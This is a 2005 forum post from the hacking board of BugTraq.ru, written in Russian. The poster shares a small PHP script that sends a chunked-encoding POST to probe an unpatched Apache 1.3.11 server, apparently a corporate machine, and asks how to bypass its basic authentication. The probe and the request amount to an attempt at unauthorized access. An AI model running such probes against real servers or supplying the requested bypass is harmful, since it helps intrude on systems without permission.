информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Где водятся OGRыСетевые кракеры и правда о деле ЛевинаПортрет посетителя
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Утекший код XP и Windows Server... 
 Дела виртуальные 
 Простое пробивание рабочего/провайдерского... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Apache/1.3.11 подскажите. 16.05.05 15:58  Число просмотров: 1916
Автор: rooot Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Есть сервак с Apache 1.3.11 (закинут наглухо, никто ничего не обновлял) по сути уязвимостей у него куча, про которые постоянно пишут в сети ( к сожалению нет ни одного примера реализации уязвимости). При попытке установки соединения с ним он выдает basic авторизацию (после не успешной попытки я как раз и узнал версию Апача).
Поковырялся в нете нашел статью об уязвимости в версии 1.3.11 (точнее об ее обнаружении) решил попробовать сворганил скрипт:
$fp = fsockopen("server.corp", 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$out = "POST /x.html HTTP/1.1\r\n";
$out .= "Host: server.corp\r\n";
$out .= "Transfer-Encoding: chunked\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);
}
так и не дождался ответа (доперло basic авторизация помешала). Да там писалось что типа если сервак отвергнет соединение значит он уязвим!!!
В общем помогите как обойти авторизацию либо что то эквивалентное моей просьбе.
Заранее спасибо.
<hacking> Поиск 








Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2020 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach